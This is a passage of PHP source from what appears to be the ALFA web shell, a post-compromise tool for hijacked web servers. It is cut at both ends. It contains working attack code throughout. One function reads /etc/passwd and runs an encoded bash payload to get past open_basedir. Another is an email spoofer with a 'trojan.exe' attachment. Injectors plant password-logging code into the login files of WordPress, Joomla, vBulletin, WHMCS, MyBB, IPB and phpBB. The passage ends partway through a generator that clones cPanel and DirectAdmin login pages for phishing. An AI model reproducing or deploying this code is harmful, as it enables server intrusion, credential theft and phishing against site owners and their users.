6123$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
6124}elseif($m=='shtml'){
6125$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
6126}
6127@__write_file($d.'.htaccess',$code);
6128}
6129function alfabasedir(){
6130alfahead();
6131echo '<div class=header>
6132<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
6133$passwd = _alfa_file('/etc/passwd');
6134if(is_array($passwd)){
6135$users = array();
6136$makepwd = alfaMakePwd();
6137$basedir = @ini_get('open_basedir');
6138$safe_mode = @ini_get('safe_mode');
6139if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
6140$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
6141$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);
6142$bash_users = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
6143$users = json_decode($bash_users, true);
6144$x=count($users);
6145if($x>=2){array_pop($users);--$x;}
6146}
6147if(!$basedir&&!$safe_mode){
6148$x=0;
6149foreach($passwd as $str){
6150$pos = strpos($str,':');
6151$username = substr($str,0,$pos);
6152$dirz = str_replace("{user}", $username, $makepwd);
6153if(($username != '')){
6154if (@is_readable($dirz)){
6155array_push($users,$username);
6156$x++;
6157}}}
6158}
6159echo '<br><br>';
6160echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
6161echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
6162echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
6163foreach($users as $user){
6164if(empty($user))continue;
6165$path = str_replace("{user}", $user, $makepwd);
6166echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
6167}
6168}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
6169echo '<br><br></b>';
6170echo '</div>';
6171alfafooter();
6172}
6173function alfamail(){
6174alfahead();
6175echo '<div class=header>';
6176AlfaNum(8,9,10);
6177echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
6178$table = array(
6179'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
6180'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
6181'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
6182'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
6183'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
6184);
6185create_table($table);
6186echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
6187if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
6188$mail_to = $_POST['alfa1'];
6189$mail_from = $_POST['alfa2'];
6190$mail_subject = $_POST['alfa3'];
6191$mail_content = $_POST['alfa5'];
6192$count_mail = (int)$_POST['alfa6'];
6193$mail_attach = $_POST['alfa7'];
6194if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
6195if(!empty($mail_attach)&&@is_file($mail_attach)){
6196$file = $mail_attach;
6197$content = __read_file($file);
6198$content = chunk_split(__ZW5jb2Rlcg($content));
6199$uid = md5(uniqid(time()));
6200$filename = basename($file);
6201$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
6202$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
6203$headers .= "Reply-To: ".$mail_from."\r\n";
6204$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
6205$headers .= 'MIME-Version: 1.0' . "\r\n";
6206$headers .= 'X-Mailer: php' . "\r\n";
6207$mail_content = "--".$uid."\r\n";
6208$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
6209$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
6210$mail_content .= $mail_content."\r\n\r\n";
6211$mail_content .= "--".$uid."\r\n";
6212$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
6213$mail_content .= "Content-Transfer-Encoding: base64\r\n";
6214$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
6215$mail_content .= $content."\r\n\r\n";
6216$mail_content .= "--".$uid."--";
6217}else{
6218$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
6219$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
6220$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
6221$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
6222$headers .= 'MIME-Version: 1.0' . "\r\n";
6223$headers .= 'X-Mailer: php' . "\r\n";
6224}
6225if(empty($count_mail)||$count_mail<1)$count_mail=1;
6226if(!empty($mail_from)){echo __pre();
6227for($i=1;$i<=$count_mail;$i++){
6228if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
6229}}else{__alert("Invalid Mail From !");}
6230}else{__alert("Invalid Mail To !");}
6231}
6232echo('</div>');
6233alfafooter();
6234}
6235function alfaziper(){
6236alfahead();
6237AlfaNum(8,9,10);
6238echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
6239<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
6240<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
6241<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
6242<input type="submit" value=" " name="ziper" />
6243</form></center></p>';
6244if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
6245$dirzip = $_POST['alfa3'];
6246$zipfile = $_POST['alfa4'];
6247if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
6248alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
6249echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
6250}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
6251alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
6252echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
6253}elseif(class_exists('ZipArchive')){
6254if(__alfaziper($dirzip, $zipfile)){
6255echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
6256}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
6257}
6258}
6259echo '</div>';
6260alfafooter();
6261}
6262function __alfaziper($source,$destination){
6263 if(!extension_loaded('zip')||!file_exists($source)){
6264 return false;
6265 }
6266 $zip=new ZipArchive();
6267 if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
6268 return false;
6269 }
6270 $source=str_replace('\\','/',realpath($source));
6271 if(is_dir($source)===true){
6272 $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
6273 foreach($files as $file){
6274 $file=str_replace('\\','/',$file);
6275 if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
6276 $file=realpath($file);
6277 if(is_dir($file)===true){
6278 $zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
6279 }else if(is_file($file)===true){
6280 $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
6281 }
6282 }
6283 }else if(is_file($source)===true){
6284 $zip->addFromString(basename($source),file_get_contents($source));
6285 }
6286 return $zip->close();
6287}
6288function alfadeziper(){
6289alfahead();
6290AlfaNum(8,9,10);
6291echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
6292<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
6293<div class="txtfont">File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
6294<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'" size="60"/>
6295<input type="submit" value=" " name="ziper" />
6296</form></center></p>';
6297if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
6298$dirzip = $_POST['alfa3'];
6299$zipfile = $_POST['alfa4'];
6300if(@!is_dir($zipfile)){
6301 @mkdir($zipfile, 0777, true);
6302}
6303$finfo = "";
6304$file_type = "";
6305if(function_exists('finfo_open')){
6306$finfo = @finfo_open(FILEINFO_MIME_TYPE);
6307$file_type = @finfo_file($finfo, $dirzip);
6308@finfo_close($finfo);
6309}else{
6310 if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
6311 $file_type = alfaEx('file -b --mime-type ' . $dirzip);
6312 }
6313}
6314if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
6315alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
6316echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
6317}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
6318switch ($file_type) {
6319 case 'application/zip':
6320 alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
6321 break;
6322 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
6323 if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
6324 alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
6325 }else{
6326 alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
6327 }
6328 break;
6329}
6330echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></b></p></center>';
6331}elseif(class_exists('ZipArchive')){
6332 $itsok = false;
6333 if(emtpy($file_type)){
6334 $file_type = "application/zip";
6335 }
6336 switch ($file_type) {
6337 case 'application/zip':
6338 $zip = new ZipArchive;
6339 $res = $zip->open($dirzip);
6340 if ($res) {
6341 $zip->extractTo($zipfile);
6342 $zip->close();
6343 $itsok = true;
6344 }
6345 break;
6346 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
6347 if(strstr(basename($dirzip), ".tar.gz")){
6348 $new_file = $zipfile .'/'. basename($dirzip);
6349 @copy($dirzip, $new_file);
6350 $new_tar = str_replace(".tar.gz", ".tar", $new_file);
6351 try {
6352 $p = new PharData($new_file);
6353 $p->decompress();
6354 $phar = new PharData($new_tar);
6355 $phar->extractTo($zipfile);
6356 @unlink($new_file);
6357 @unlink($new_tar);
6358 $itsok = true;
6359 } catch (Exception $e) {
6360 }
6361 }else{
6362 try {
6363 $phar = new PharData($dirzip);
6364 $phar->extractTo($zipfile);
6365 $itsok = true;
6366 } catch (Exception $e) {
6367 }
6368 }
6369 break;
6370 }
6371if($itsok){
6372echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></p></center>';
6373}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
6374}
6375}
6376echo '</div>';
6377alfafooter();
6378}
6379function alfacmshijacker(){
6380alfahead();
6381AlfaNum(5,6,7,8,9,10);
6382echo '<div class=header><br>
6383<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
6384<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
6385$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
6386foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
6387echo("</select>");
6388echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
6389SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
6390<input type="submit" name="btn" value=" "></form></center><br>';
6391$cms = $_POST['alfa1'];
6392$saveto = $_POST['alfa2'];
6393$cmspath = $_POST['alfa4'];
6394if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
6395echo __pre();
6396alfaHijackCms($cms,$cmspath,$saveto);
6397}
6398echo '</div>';
6399alfafooter();
6400}
6401function alfaHijackCms($cms,$cmspath,$saveto){
6402switch($cms){
6403case "vb":
6404hijackvBulletin($cmspath,$saveto);
6405break;
6406case "wp":
6407hijackwp($cmspath,$saveto);
6408break;
6409case "jom":
6410hijackJoomla($cmspath,$saveto);
6411break;
6412case "whmcs":
6413hijackWhmcs($cmspath,$saveto);
6414break;
6415case "mybb":
6416hijackMybb($cmspath,$saveto);
6417break;
6418case "ipb":
6419hijackIPB($cmspath,$saveto);
6420break;
6421case "phpbb":
6422hijackPHPBB($cmspath,$saveto);
6423break;
6424default:
6425echo "error!";
6426break;
6427}
6428}
6429function hijackvBulletin($path,$saveto){
6430$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
6431$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
6432$code=str_replace('{saveto_path}',$saveto,$code);
6433$login = $path."/login.php";
6434$class = $path."/includes/class_bootstrap.php";
6435$dologin = 'do_login_redirect();';
6436$evil_login = "\t".$code."\n\t".$dologin;
6437$evil_class = "true";
6438if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
6439$data_login = @file_get_contents($login);
6440$data_class = @file_get_contents($class);
6441if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
6442$login_replace = str_replace($dologin,$evil_login, $data_login);
6443$class_replace = str_replace($clearpw,$evil_class, $data_class);
6444@file_put_contents($login, $login_replace);
6445@file_put_contents($class, $class_replace);
6446hijackOutput(0,$saveto);
6447}else{
6448hijackOutput(1);
6449}
6450}else{
6451hijackOutput(1);
6452}
6453}
6454function hijackwp($path,$saveto){
6455$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
6456$redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#';
6457$code=str_replace('{saveto_path}',$saveto,$code);
6458$login=$path."/wp-login.php";
6459if(@is_file($login) AND @is_writable($login)){
6460$data_login = @file_get_contents($login);
6461if(@preg_match($redirect_wp, $data_login, $match)){
6462$evil_login = "\t".$match[0]."\n\t".$code;
6463$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);
6464@file_put_contents($login, $login_replace);
6465hijackOutput(0,$saveto);
6466}else{
6467hijackOutput(1);
6468}
6469}else{
6470hijackOutput(1);
6471}
6472}
6473function hijackJoomla($path,$saveto){
6474$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
6475$code=str_replace('{saveto_path}',$saveto,$code);
6476$comp=$path."/administrator/components/com_login/";
6477if(@is_file($comp."/login.php")){
6478$login = $comp."/login.php";
6479}elseif(@is_file($comp."/admin.login.php")){
6480$login = $comp."/admin.login.php";
6481}else{
6482$login = '';
6483}
6484if(@is_file($login) AND @is_writable($login) AND $login != ''){
6485$data_login = @file_get_contents($login);
6486$evil_login = $code."\n".$data_login;
6487@file_put_contents($login, $evil_login);
6488hijackOutput(0,$saveto);
6489}else{
6490hijackOutput(1);
6491}
6492}
6493function hijackWhmcs($path,$saveto){
6494$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
6495$code=str_replace('{saveto_path}',$saveto,$code);
6496$conf=$path."/configuration.php";
6497if(@is_file($conf) AND @is_writable($conf)){
6498$data_conf = @file_get_contents($conf);
6499if(!strstr($data_conf,'?>'))$code = '?>'.$code;
6500$evil_conf = $data_conf."\n".$code;
6501@file_put_contents($conf, $evil_conf);
6502hijackOutput(0,$saveto);
6503}else{
6504hijackOutput(1);
6505}
6506}
6507function hijackMybb($path,$saveto){
6508$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
6509$find = '$loginhandler->complete_login();';
6510$code=str_replace('{saveto_path}',$saveto,$code);
6511$login=$path."/member.php";
6512$evil_login = "\t".$code."\n\t".$find;
6513if(@is_file($login) AND @is_writable($login)){
6514$data_login = @file_get_contents($login);
6515if(strstr($data_login, $find)){
6516$login_replace = str_replace($find,$evil_login, $data_login);
6517@file_put_contents($login, $login_replace);
6518hijackOutput(0,$saveto);
6519}else{
6520hijackOutput(1);
6521}
6522}else{
6523hijackOutput(1);
6524}
6525}
6526function hijackIPB($path,$saveto){
6527$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
6528$find = 'unset( $member[\'plainPassword\'] );';
6529$code=str_replace('{saveto_path}',$saveto,$code);
6530$login=$path."/admin/sources/handlers/han_login.php";
6531$evil_login = "\t".$find."\n\t".$code;
6532if(@is_file($login) AND @is_writable($login)){
6533$data_login = @file_get_contents($login);
6534if(strstr($data_login, $find)){
6535$login_replace = str_replace($find,$evil_login, $data_login);
6536@file_put_contents($login, $login_replace);
6537hijackOutput(0,$saveto);
6538}else{
6539hijackOutput(1);
6540}
6541}else{
6542hijackOutput(1);
6543}
6544}
6545function hijackPHPBB($path,$saveto){
6546$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
6547$find = 'case \'login\':';
6548$code=str_replace('{saveto_path}',$saveto,$code);
6549$login=$path."/ucp.php";
6550$evil_login = "\t".$find."\n\t".$code;
6551if(@is_file($login) AND @is_writable($login)){
6552$data_login = @file_get_contents($login);
6553if(strstr($data_login, $find)){
6554$login_replace = str_replace($find,$evil_login, $data_login);
6555@file_put_contents($login, $login_replace);
6556hijackOutput(0,$saveto);
6557}else{
6558hijackOutput(1);
6559}
6560}else{
6561hijackOutput(1);
6562}
6563}
6564function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
6565function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
6566if(@is_dir($dir)){
6567$files=@scandir($dir);
6568foreach($files as $key => $value){
6569$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
6570if(!@is_dir($path)){
6571if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
6572if($e=='str'){
6573$content = @file_get_contents($path);
6574if(strpos($content, $string) !== false){
6575echo str_replace('\\','/',$path) . "<br>";
6576}
6577}else{
6578if(strstr($value,$string)){
6579echo str_replace('\\','/',$path) . "<br>";
6580}
6581}
6582$results[] = $path;
6583}elseif($value != "." && $value != "..") {
6584Alfa_StrSearcher($path,$string,$ext,$e,$results);
6585$results[] = $path;
6586}}}}
6587function alfafakepage(){
6588 alfahead();
6589 AlfaNum(9,10);
6590 echo '<div class=header><br>
6591 <center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\'fakepage\',null,this.clone_page.value,this.fake_root.value,\'>>\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\'post\'>
6592 <div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">';
6593 $cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");
6594 foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
6595 echo("</select></div>");
6596 echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
6597 <div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="'.$_SERVER["DOCUMENT_ROOT"].'/fake_page_root/"></div>
6598 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="'.$_SERVER["DOCUMENT_ROOT"].'/index.php"></div>
6599 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: '.$_SERVER["DOCUMENT_ROOT"].'/wp-login.php"></div>
6600 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="'.$GLOBALS['cwd'].'logs.txt"></div>
6601 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
6602 <div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
6603 $clone_page = $_POST['alfa1'];
6604 $fake_root = $_POST['alfa2'];
6605 $logto = $_POST['alfa4'];
6606 $panel = $_POST['alfa5'];
6607 $inject_to = $_POST['alfa6'];
6608 $bind_on = $_POST['alfa7'];
6609 $count = $_POST['alfa8'];
6610 if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){
6611 echo __pre();
6612 $target = $clone_page;
6613 $curl = new AlfaCURL();
6614 $source_page = $curl->Send($target);
6615 if(!empty($source_page)){
6616 $matched_form = "";
6617 if($panel == "cpanel"){
6618 if(preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)){
6619 $matched_form = $match[0];
6620 }
6621 }else{
6622 if(preg_match('#<form(.*?)>#', $source_page, $match)){
6623 $matched_form = $match[0];
6624 }
6625 }
6626 if(!empty($matched_form)){
6627 $fake = "";
6628 $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
6629 $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
6630 if($panel == "cpanel"){
6631 $port = "2083";
6632 }else{
6633 $target = str_replace(array("http://", "https://"), "", $target);
6634 $port = explode(":",$target);
6635 $port = $port[1];
6636 }
6637 if(substr($uri, 0, 1) == "/"){
6638 $uri = substr($uri, 1);
6639 }
6640 $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
6641 $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
6642 if($panel == "cpanel"){
6643 $form = '<form novalidate id="login_form" action="'.$log_url.'" method="post" target="_top" style="visibility:">';
6644 }else{
6645 $form = '<form action="'.$log_url.'" method="post">';
6646 }
6647 $fake = str_replace($matched_form, $form, $source_page);
6648 if(@!is_dir($fake_root)){
6649 @mkdir($fake_root, 0777, true);
6650 }
6651
6652 $cookie_name = "alfa_fakepage_counter" . rand(9999,99999);
6653
6654 $post_user = 'user';
6655 $post_pass = 'pass';
6656 $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
6657 if($panel != "cpanel"){
6658 $post_user = 'username';
6659 $post_pass = 'password';
6660 $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
6661 }
6662
